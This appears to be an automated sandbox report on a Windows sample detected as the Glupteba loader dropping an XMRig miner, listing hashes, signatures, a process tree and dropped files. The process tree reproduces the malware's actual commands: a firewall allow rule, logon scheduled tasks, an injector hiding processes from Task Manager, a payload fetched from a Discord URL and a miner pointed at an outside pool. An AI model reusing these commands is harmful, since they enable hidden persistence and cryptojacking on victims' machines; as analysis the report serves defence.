Analysis

  • max time kernel
    1s
  • max time network
    306s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    18-04-2024 23:06

General

  • Target

    bc17b98f8979b68f1c1928e076f24247f3e3a0ea0488c1c4e84e8613eb5ac7d6.exe

  • Size

    4.2MB

  • MD5

    500131f4ecd5501fce6b0238da1f94e9

  • SHA1

    cf5cd08cb825aea00067fe77657fa0bf0537cc77

  • SHA256

    bc17b98f8979b68f1c1928e076f24247f3e3a0ea0488c1c4e84e8613eb5ac7d6

  • SHA512

    c67f0c540ad1f9e766eb153bbe93f15999f6298b681e9392109b85e5e21507414bc0ca94df2df855cb6a10b4848dbca188aba3640afae4443a1e5c4671a962c2

  • SSDEEP

    98304:VuMksqipP1XHlFWFXwmFrGSppmsRKA6e2iRIo9R1q7CH9:Rks3vXHKFwmqsRR/2MI8a7Cd

Malware Config

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 38 IoCs
  • XMRig Miner payload 2 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • UPX packed file 11 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • GoLang User-Agent 3 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\bc17b98f8979b68f1c1928e076f24247f3e3a0ea0488c1c4e84e8613eb5ac7d6.exe
    "C:\Users\Admin\AppData\Local\Temp\bc17b98f8979b68f1c1928e076f24247f3e3a0ea0488c1c4e84e8613eb5ac7d6.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4988
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2560
    • C:\Users\Admin\AppData\Local\Temp\bc17b98f8979b68f1c1928e076f24247f3e3a0ea0488c1c4e84e8613eb5ac7d6.exe
      "C:\Users\Admin\AppData\Local\Temp\bc17b98f8979b68f1c1928e076f24247f3e3a0ea0488c1c4e84e8613eb5ac7d6.exe"
      2⤵
        PID:4200
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -nologo -noprofile
          3⤵
            PID:2268
          • C:\Windows\System32\cmd.exe
            C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
            3⤵
              PID:4580
              • C:\Windows\system32\netsh.exe
                netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                4⤵
                • Modifies Windows Firewall
                PID:1628
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -nologo -noprofile
              3⤵
                PID:692
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -nologo -noprofile
                3⤵
                  PID:5068
                • C:\Windows\rss\csrss.exe
                  C:\Windows\rss\csrss.exe
                  3⤵
                    PID:1348
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      powershell -nologo -noprofile
                      4⤵
                        PID:4428
                      • C:\Windows\SYSTEM32\schtasks.exe
                        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                        4⤵
                        • Creates scheduled task(s)
                        PID:480
                      • C:\Windows\SYSTEM32\schtasks.exe
                        schtasks /delete /tn ScheduledUpdate /f
                        4⤵
                          PID:4688
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -nologo -noprofile
                          4⤵
                            PID:1356
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell -nologo -noprofile
                            4⤵
                              PID:4568
                            • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                              C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                              4⤵
                                PID:2376
                              • C:\Windows\SYSTEM32\schtasks.exe
                                schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                4⤵
                                • Creates scheduled task(s)
                                PID:2384
                              • C:\Windows\windefender.exe
                                "C:\Windows\windefender.exe"
                                4⤵
                                  PID:2148
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                    5⤵
                                      PID:5040
                                      • C:\Windows\SysWOW64\sc.exe
                                        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                        6⤵
                                        • Launches sc.exe
                                        PID:1648
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -nologo -noprofile
                                    4⤵
                                      PID:1504
                                    • C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
                                      C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=al2xoqueel0She4t -m=https://cdn.discordapp.com/attachments/1225871855328559147/1225878907014615161/kVYazCOZSwqudV?ex=6622bbb3&is=661046b3&hm=c80160577fcc82f0e337c537bdd214d60583ed75bb187a016d90f94471fc09b0& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:80
                                      4⤵
                                        PID:868
                                        • C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe
                                          C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe -o showlock.net:40001 --rig-id 597fa065-6edd-4b80-b59e-8f243e1816dd --tls --nicehash -o showlock.net:443 --rig-id 597fa065-6edd-4b80-b59e-8f243e1816dd --tls --nicehash -o showlock.net:80 --rig-id 597fa065-6edd-4b80-b59e-8f243e1816dd --nicehash --http-port 3433 --http-access-token 597fa065-6edd-4b80-b59e-8f243e1816dd --randomx-wrmsr=-1
                                          5⤵
                                            PID:4016
                                          • C:\Windows\rss\csrss.exe
                                            C:\Windows\rss\csrss.exe -hide 4016
                                            5⤵
                                              PID:3640
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -nologo -noprofile
                                                6⤵
                                                  PID:820
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -nologo -noprofile
                                              4⤵
                                                PID:4380
                                              • C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
                                                C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
                                                4⤵
                                                  PID:1368
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -nologo -noprofile
                                                  4⤵
                                                    PID:340
                                                  • C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
                                                    C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
                                                    4⤵
                                                      PID:2484
                                              • C:\Windows\windefender.exe
                                                C:\Windows\windefender.exe
                                                1⤵
                                                  PID:1712

                                                Network

                                                MITRE ATT&CK Enterprise v15

                                                Replay Monitor

                                                Loading Replay Monitor...

                                                Downloads

                                                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kgozz3rr.25y.ps1
                                                  Filesize

                                                  1B

                                                  MD5

                                                  c4ca4238a0b923820dcc509a6f75849b

                                                  SHA1

                                                  356a192b7913b04c54574d18c28d46e6395428ab

                                                  SHA256

                                                  6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                                                  SHA512

                                                  4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                                                • C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
                                                  Filesize

                                                  2.0MB

                                                  MD5

                                                  1bf850b4d9587c1017a75a47680584c4

                                                  SHA1

                                                  75cd4738ffc07f203c3f3356bc946fdd0bcdbe19

                                                  SHA256

                                                  ac470c2fa05a67dd03cdc427e9957e661cd0ec7aecd9682ddb0b32c5cfc18955

                                                  SHA512

                                                  ed57be8c5a982bcbf901c2b035eb010e353508e7c7df338adc6e5c307e94427645e5f5ec28667fd861420b9411b4ade96ea6987519ed65e6c1d905b6eadfce08

                                                • C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
                                                  Filesize

                                                  2.8MB

                                                  MD5

                                                  713674d5e968cbe2102394be0b2bae6f

                                                  SHA1

                                                  90ac9bd8e61b2815feb3599494883526665cb81e

                                                  SHA256

                                                  f724b2849e7dc38bf62114c11092020073bea509e2bc57dea7a94a2fc9c23057

                                                  SHA512

                                                  e9fba80067ac39d5907560abd044bb97dfcf078db2b6696ff4ca5990d9803a0c24b39d04e05682ac3dac8bc472e2ee0c573a46514e907f4d9673d4e7a76caafb

                                                • C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
                                                  Filesize

                                                  2.0MB

                                                  MD5

                                                  dcb505dc2b9d8aac05f4ca0727f5eadb

                                                  SHA1

                                                  4f633edb62de05f3d7c241c8bc19c1e0be7ced75

                                                  SHA256

                                                  61f9194b9f33611ec902f02755cf2e86f0bbc84c2102c6e5d1874f9bae78e551

                                                  SHA512

                                                  31e1fce9aca3b5d9afc85640af04b4542b9897f7d60b699e3153516137d9358d3c101cacc04e9e594e36b8622e9489cecf0dda210662563565d80fb9a33549b3

                                                • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                                                  Filesize

                                                  281KB

                                                  MD5

                                                  d98e33b66343e7c96158444127a117f6

                                                  SHA1

                                                  bb716c5509a2bf345c6c1152f6e3e1452d39d50d

                                                  SHA256

                                                  5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1

                                                  SHA512

                                                  705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

                                                • C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe
                                                  Filesize

                                                  5.2MB

                                                  MD5

                                                  4f649a57b7ddf3874c9a2163a73e9b07

                                                  SHA1

                                                  9c966520ba8233f13f168cade548baf5a30823ba

                                                  SHA256

                                                  830afffc7dd32e007736f0d97e8d02f68f80988266e68e3de3250aa189ac8491

                                                  SHA512

                                                  b2374bac551b0d4e87f38eb0090a9df0705a8600667fecba6a94e5c67ff93fc8b4707a905ce0e5ef0909e91b04dc01d74c21887a5b5958b8b2fd01faed253aac

                                                • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                                                  Filesize

                                                  2KB

                                                  MD5

                                                  1c19c16e21c97ed42d5beabc93391fc5

                                                  SHA1

                                                  8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68

                                                  SHA256

                                                  1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05

                                                  SHA512

                                                  7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c

                                                • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
                                                  Filesize

                                                  18KB

                                                  MD5

                                                  a3244e261eca28ce1c77202c61aa406b

                                                  SHA1

                                                  95c0b8726d7ab2337313d3d363b3cc741f2d7078

                                                  SHA256

                                                  14e1041ec493ce8e099b7e48b124759fe31a7cc915b3c49f79f635a37b1fab6e

                                                  SHA512

                                                  6fe42a3474d20a53bbdc2357d642022f96498b9925155da5fbaeb364ce943cb2fbe39796dd976bc9fe553270557b55916adcf780933c58d014ca1dc17a5e403d

                                                • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
                                                  Filesize

                                                  18KB

                                                  MD5

                                                  bc4542be69113821186847a4663f480e

                                                  SHA1

                                                  a9781f999ab767277cb1d998c71893704533d995

                                                  SHA256

                                                  889e205c40bbba8ed6126336726dc2038098b1b358b3ef9a91c1257e417dbd4c

                                                  SHA512

                                                  e8fc69a45fe0c7eca39d692342c04729fd252ec89c69f879447002ef5e1eb8af7d312bff83f518d2ffbbdee092d9aba7985b30ff72a116d3705ef00f65174de4

                                                • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
                                                  Filesize

                                                  18KB

                                                  MD5

                                                  c61f2f4f276084e64d80bb728e1159ce

                                                  SHA1

                                                  b35597aca4fca6a297fc05da94ddd763e8c8d519

                                                  SHA256

                                                  9b77ef2e83682419a3e9af3892eaba7e3dd98395243ada5e34d017453ebd9071

                                                  SHA512

                                                  b112e921643713b850d107649692fe31b0ca36b2fe8802dee8ee214065728ca579ca020bd5d7bbb1de94a12cd004539be8445a0612ef6701653b28026c163ea9

                                                • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
                                                  Filesize

                                                  18KB

                                                  MD5

                                                  bfdb6110169d2deaf10e8445aa0e9a81

                                                  SHA1

                                                  4772f59efa94b9146010f1290308a719cb19e8fd

                                                  SHA256

                                                  5df3877e0fb90764ee7f19f1b9893e7377d859b756c9fcee51b892ceb3d46045

                                                  SHA512

                                                  1f29b3ba7d49f668653d49325a82f82c326524c6760c3fb4f9be8be815bc28d6d8ce0c18678603834c661d8a2c3644d6dd333ab6d695c8ffc9aa9dde43159619

                                                • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
                                                  Filesize

                                                  18KB

                                                  MD5

                                                  82cc74ba15e61a93e9e66f918ee517f4

                                                  SHA1

                                                  b27276afec79da50ccbe7992b72cdfb329b84217

                                                  SHA256

                                                  904ef785cef41d701cb9bd2416a481e69cf1ce2f939d7ae40dc3c39e1bd12c94

                                                  SHA512

                                                  5108e3f1b981eafebf6936b7e15dc692aac4bdaafa2fcdbf579ade873178e3190d2177d12e54cfdcc176d5e2e709fcc468064663eddf3f48b4e3fcc6c89a0333

                                                • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
                                                  Filesize

                                                  18KB

                                                  MD5

                                                  eb74e5c0ad71a7147963f63330869929

                                                  SHA1

                                                  8bcad89eca7e92504cbf748a4cee70e3d582bbab

                                                  SHA256

                                                  01e7acb5abf68450fc4f5864c926d023844e523e8538cb80e1614f752ce3fcd5

                                                  SHA512

                                                  447c7fbb920f68bf059811664c9f6cd3b8ccbc5aafacb59d9c7b70d492382a6c93e9303591792029c2bb91148756190a3f7e30a2413e2080397e2afa78aec99f

                                                • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
                                                  Filesize

                                                  18KB

                                                  MD5

                                                  62c0339a004cf9ad82ca321e14c87130

                                                  SHA1

                                                  9b1ea29cba2deae100e19a17797ff95cce961f2d

                                                  SHA256

                                                  06799f7333759afa7455abb5e2aea703c9a4c5f12e177a044fb0b1565b3502e1

                                                  SHA512

                                                  760cbb942a7f20a0cfa1465b7ff7029dd59669ee59b2051f3c641c124a2addcaa88fa15e1e867bc511c4e5bdbf2dea67c2bab1cb188bcdf423f83619e774b460

                                                • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
                                                  Filesize

                                                  18KB

                                                  MD5

                                                  bb7842b7468f2545d04e6eba8202212b

                                                  SHA1

                                                  13603a783753172c596073f3fb0400facd0928ac

                                                  SHA256

                                                  92dbf8431750407f2c1ebff6ba215f095f82d388f921f32c4f393d5f8b6e8612

                                                  SHA512

                                                  a359fecdcef70eff7eeb9bb45d27fce708a37e080fe55993ca00f9d8ce41a0e31e9f1a2d246ab68665c7369f55f234b403776291ed9e348671978d210a420518

                                                • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
                                                  Filesize

                                                  18KB

                                                  MD5

                                                  89ef81a01e41fafddd665d26242d2a7a

                                                  SHA1

                                                  9983c403f7c060271141bbdbc60135c6c079ef2d

                                                  SHA256

                                                  3fab737c9c1a8c4a2e7916b8840e3e0af7be635ef81dd0452a70effb4182331d

                                                  SHA512

                                                  9463e3d860484a2c5a51d234ca4f56e8cfff706b524342fb8d6224214ff2f0976c95369ec3c108caae6335cc6476bd44c223d482bb5600c23d91bfc9d8d9e1d7

                                                • C:\Windows\rss\csrss.exe
                                                  Filesize

                                                  4.2MB

                                                  MD5

                                                  500131f4ecd5501fce6b0238da1f94e9

                                                  SHA1

                                                  cf5cd08cb825aea00067fe77657fa0bf0537cc77

                                                  SHA256

                                                  bc17b98f8979b68f1c1928e076f24247f3e3a0ea0488c1c4e84e8613eb5ac7d6

                                                  SHA512

                                                  c67f0c540ad1f9e766eb153bbe93f15999f6298b681e9392109b85e5e21507414bc0ca94df2df855cb6a10b4848dbca188aba3640afae4443a1e5c4671a962c2

                                                • C:\Windows\windefender.exe
                                                  Filesize

                                                  2.0MB

                                                  MD5

                                                  8e67f58837092385dcf01e8a2b4f5783

                                                  SHA1

                                                  012c49cfd8c5d06795a6f67ea2baf2a082cf8625

                                                  SHA256

                                                  166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa

                                                  SHA512

                                                  40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec

                                                • memory/692-576-0x00000000704D0000-0x0000000070820000-memory.dmp
                                                  Filesize

                                                  3.3MB

                                                • memory/692-551-0x0000000073750000-0x0000000073E3E000-memory.dmp
                                                  Filesize

                                                  6.9MB

                                                • memory/692-790-0x0000000073750000-0x0000000073E3E000-memory.dmp
                                                  Filesize

                                                  6.9MB

                                                • memory/692-574-0x0000000070480000-0x00000000704CB000-memory.dmp
                                                  Filesize

                                                  300KB

                                                • memory/692-575-0x000000007F130000-0x000000007F140000-memory.dmp
                                                  Filesize

                                                  64KB

                                                • memory/692-553-0x00000000047E0000-0x00000000047F0000-memory.dmp
                                                  Filesize

                                                  64KB

                                                • memory/692-554-0x00000000047E0000-0x00000000047F0000-memory.dmp
                                                  Filesize

                                                  64KB

                                                • memory/868-2362-0x0000000000400000-0x00000000008E1000-memory.dmp
                                                  Filesize

                                                  4.9MB

                                                • memory/1348-1792-0x0000000000400000-0x000000000310F000-memory.dmp
                                                  Filesize

                                                  45.1MB

                                                • memory/1348-1812-0x0000000000400000-0x000000000310F000-memory.dmp
                                                  Filesize

                                                  45.1MB

                                                • memory/1348-1810-0x0000000000400000-0x000000000310F000-memory.dmp
                                                  Filesize

                                                  45.1MB

                                                • memory/1348-1808-0x0000000000400000-0x000000000310F000-memory.dmp
                                                  Filesize

                                                  45.1MB

                                                • memory/1348-1039-0x0000000005500000-0x0000000005DEB000-memory.dmp
                                                  Filesize

                                                  8.9MB

                                                • memory/1348-1806-0x0000000000400000-0x000000000310F000-memory.dmp
                                                  Filesize

                                                  45.1MB

                                                • memory/1348-1804-0x0000000000400000-0x000000000310F000-memory.dmp
                                                  Filesize

                                                  45.1MB

                                                • memory/1348-1802-0x0000000000400000-0x000000000310F000-memory.dmp
                                                  Filesize

                                                  45.1MB

                                                • memory/1348-1800-0x0000000000400000-0x000000000310F000-memory.dmp
                                                  Filesize

                                                  45.1MB

                                                • memory/1348-1798-0x0000000000400000-0x000000000310F000-memory.dmp
                                                  Filesize

                                                  45.1MB

                                                • memory/1348-1796-0x0000000000400000-0x000000000310F000-memory.dmp
                                                  Filesize

                                                  45.1MB

                                                • memory/1348-1794-0x0000000000400000-0x000000000310F000-memory.dmp
                                                  Filesize

                                                  45.1MB

                                                • memory/1348-1042-0x0000000000400000-0x000000000310F000-memory.dmp
                                                  Filesize

                                                  45.1MB

                                                • memory/1348-1038-0x0000000005100000-0x00000000054F9000-memory.dmp
                                                  Filesize

                                                  4.0MB

                                                • memory/1348-1790-0x0000000000400000-0x000000000310F000-memory.dmp
                                                  Filesize

                                                  45.1MB

                                                • memory/1348-1824-0x0000000000400000-0x000000000310F000-memory.dmp
                                                  Filesize

                                                  45.1MB

                                                • memory/1348-1788-0x0000000000400000-0x000000000310F000-memory.dmp
                                                  Filesize

                                                  45.1MB

                                                • memory/1348-2850-0x0000000000400000-0x000000000310F000-memory.dmp
                                                  Filesize

                                                  45.1MB

                                                • memory/1348-1814-0x0000000000400000-0x000000000310F000-memory.dmp
                                                  Filesize

                                                  45.1MB

                                                • memory/1348-1816-0x0000000000400000-0x000000000310F000-memory.dmp
                                                  Filesize

                                                  45.1MB

                                                • memory/1348-1830-0x0000000000400000-0x000000000310F000-memory.dmp
                                                  Filesize

                                                  45.1MB

                                                • memory/1348-1826-0x0000000000400000-0x000000000310F000-memory.dmp
                                                  Filesize

                                                  45.1MB

                                                • memory/1348-1818-0x0000000000400000-0x000000000310F000-memory.dmp
                                                  Filesize

                                                  45.1MB

                                                • memory/1348-2856-0x0000000000400000-0x000000000310F000-memory.dmp
                                                  Filesize

                                                  45.1MB

                                                • memory/1348-1820-0x0000000000400000-0x000000000310F000-memory.dmp
                                                  Filesize

                                                  45.1MB

                                                • memory/1348-1822-0x0000000000400000-0x000000000310F000-memory.dmp
                                                  Filesize

                                                  45.1MB

                                                • memory/1348-2715-0x0000000000400000-0x000000000310F000-memory.dmp
                                                  Filesize

                                                  45.1MB

                                                • memory/1348-1779-0x0000000000400000-0x000000000310F000-memory.dmp
                                                  Filesize

                                                  45.1MB

                                                • memory/1348-1828-0x0000000000400000-0x000000000310F000-memory.dmp
                                                  Filesize

                                                  45.1MB

                                                • memory/1348-2525-0x0000000000400000-0x000000000310F000-memory.dmp
                                                  Filesize

                                                  45.1MB

                                                • memory/1368-2708-0x0000000000060000-0x000000000092D000-memory.dmp
                                                  Filesize

                                                  8.8MB

                                                • memory/1368-2826-0x0000000000060000-0x000000000092D000-memory.dmp
                                                  Filesize

                                                  8.8MB

                                                • memory/1712-1789-0x0000000000400000-0x00000000008DF000-memory.dmp
                                                  Filesize

                                                  4.9MB

                                                • memory/1712-1793-0x0000000000400000-0x00000000008DF000-memory.dmp
                                                  Filesize

                                                  4.9MB

                                                • memory/2148-1786-0x0000000000400000-0x00000000008DF000-memory.dmp
                                                  Filesize

                                                  4.9MB

                                                • memory/2268-338-0x0000000004A20000-0x0000000004A30000-memory.dmp
                                                  Filesize

                                                  64KB

                                                • memory/2268-309-0x0000000004A20000-0x0000000004A30000-memory.dmp
                                                  Filesize

                                                  64KB

                                                • memory/2268-308-0x0000000007870000-0x0000000007BC0000-memory.dmp
                                                  Filesize

                                                  3.3MB

                                                • memory/2268-311-0x0000000007FA0000-0x0000000007FEB000-memory.dmp
                                                  Filesize

                                                  300KB

                                                • memory/2268-310-0x0000000073750000-0x0000000073E3E000-memory.dmp
                                                  Filesize

                                                  6.9MB

                                                • memory/2268-307-0x0000000004A20000-0x0000000004A30000-memory.dmp
                                                  Filesize

                                                  64KB

                                                • memory/2268-331-0x0000000070480000-0x00000000704CB000-memory.dmp
                                                  Filesize

                                                  300KB

                                                • memory/2268-337-0x00000000093F0000-0x0000000009495000-memory.dmp
                                                  Filesize

                                                  660KB

                                                • memory/2268-332-0x00000000704D0000-0x0000000070820000-memory.dmp
                                                  Filesize

                                                  3.3MB

                                                • memory/2268-330-0x000000007F510000-0x000000007F520000-memory.dmp
                                                  Filesize

                                                  64KB

                                                • memory/2268-548-0x0000000073750000-0x0000000073E3E000-memory.dmp
                                                  Filesize

                                                  6.9MB

                                                • memory/2484-2855-0x0000000000400000-0x00000000008E8000-memory.dmp
                                                  Filesize

                                                  4.9MB

                                                • memory/2560-10-0x0000000007040000-0x0000000007062000-memory.dmp
                                                  Filesize

                                                  136KB

                                                • memory/2560-8-0x0000000006B30000-0x0000000006B40000-memory.dmp
                                                  Filesize

                                                  64KB

                                                • memory/2560-15-0x0000000007E00000-0x0000000007E4B000-memory.dmp
                                                  Filesize

                                                  300KB

                                                • memory/2560-14-0x0000000007DE0000-0x0000000007DFC000-memory.dmp
                                                  Filesize

                                                  112KB

                                                • memory/2560-72-0x000000007F730000-0x000000007F740000-memory.dmp
                                                  Filesize

                                                  64KB

                                                • memory/2560-81-0x0000000009DB0000-0x0000000009E55000-memory.dmp
                                                  Filesize

                                                  660KB

                                                • memory/2560-34-0x0000000008E80000-0x0000000008EBC000-memory.dmp
                                                  Filesize

                                                  240KB

                                                • memory/2560-12-0x00000000070E0000-0x0000000007146000-memory.dmp
                                                  Filesize

                                                  408KB

                                                • memory/2560-83-0x0000000009FD0000-0x000000000A064000-memory.dmp
                                                  Filesize

                                                  592KB

                                                • memory/2560-6-0x0000000004910000-0x0000000004946000-memory.dmp
                                                  Filesize

                                                  216KB

                                                • memory/2560-9-0x0000000007170000-0x0000000007798000-memory.dmp
                                                  Filesize

                                                  6.2MB

                                                • memory/2560-74-0x0000000070360000-0x00000000703AB000-memory.dmp
                                                  Filesize

                                                  300KB

                                                • memory/2560-82-0x0000000006B30000-0x0000000006B40000-memory.dmp
                                                  Filesize

                                                  64KB

                                                • memory/2560-7-0x0000000073650000-0x0000000073D3E000-memory.dmp
                                                  Filesize

                                                  6.9MB

                                                • memory/2560-65-0x0000000008F40000-0x0000000008FB6000-memory.dmp
                                                  Filesize

                                                  472KB

                                                • memory/2560-11-0x0000000007910000-0x0000000007976000-memory.dmp
                                                  Filesize

                                                  408KB

                                                • memory/2560-13-0x0000000007A30000-0x0000000007D80000-memory.dmp
                                                  Filesize

                                                  3.3MB

                                                • memory/2560-76-0x0000000009D50000-0x0000000009D6E000-memory.dmp
                                                  Filesize

                                                  120KB

                                                • memory/2560-75-0x00000000703B0000-0x0000000070700000-memory.dmp
                                                  Filesize

                                                  3.3MB

                                                • memory/2560-299-0x0000000073650000-0x0000000073D3E000-memory.dmp
                                                  Filesize

                                                  6.9MB

                                                • memory/2560-276-0x0000000009F30000-0x0000000009F4A000-memory.dmp
                                                  Filesize

                                                  104KB

                                                • memory/2560-281-0x0000000009F10000-0x0000000009F18000-memory.dmp
                                                  Filesize

                                                  32KB

                                                • memory/2560-73-0x0000000009D70000-0x0000000009DA3000-memory.dmp
                                                  Filesize

                                                  204KB

                                                • memory/3640-2711-0x0000000000400000-0x000000000310F000-memory.dmp
                                                  Filesize

                                                  45.1MB

                                                • memory/3640-2849-0x0000000000400000-0x000000000310F000-memory.dmp
                                                  Filesize

                                                  45.1MB

                                                • memory/4016-2366-0x000001A8BC330000-0x000001A8BC350000-memory.dmp
                                                  Filesize

                                                  128KB

                                                • memory/4200-303-0x0000000004D00000-0x0000000005108000-memory.dmp
                                                  Filesize

                                                  4.0MB

                                                • memory/4200-797-0x0000000000400000-0x000000000310F000-memory.dmp
                                                  Filesize

                                                  45.1MB

                                                • memory/4200-306-0x0000000000400000-0x000000000310F000-memory.dmp
                                                  Filesize

                                                  45.1MB

                                                • memory/4200-581-0x0000000004D00000-0x0000000005108000-memory.dmp
                                                  Filesize

                                                  4.0MB

                                                • memory/4200-1035-0x0000000000400000-0x000000000310F000-memory.dmp
                                                  Filesize

                                                  45.1MB

                                                • memory/4428-1045-0x00000000736B0000-0x0000000073D9E000-memory.dmp
                                                  Filesize

                                                  6.9MB

                                                • memory/4428-1046-0x0000000007820000-0x0000000007B70000-memory.dmp
                                                  Filesize

                                                  3.3MB

                                                • memory/4428-1044-0x0000000000E30000-0x0000000000E40000-memory.dmp
                                                  Filesize

                                                  64KB

                                                • memory/4428-1048-0x0000000007D10000-0x0000000007D5B000-memory.dmp
                                                  Filesize

                                                  300KB

                                                • memory/4428-1043-0x0000000000E30000-0x0000000000E40000-memory.dmp
                                                  Filesize

                                                  64KB

                                                • memory/4988-2-0x00000000051B0000-0x0000000005A9B000-memory.dmp
                                                  Filesize

                                                  8.9MB

                                                • memory/4988-3-0x0000000000400000-0x000000000310F000-memory.dmp
                                                  Filesize

                                                  45.1MB

                                                • memory/4988-300-0x0000000000400000-0x000000000310F000-memory.dmp
                                                  Filesize

                                                  45.1MB

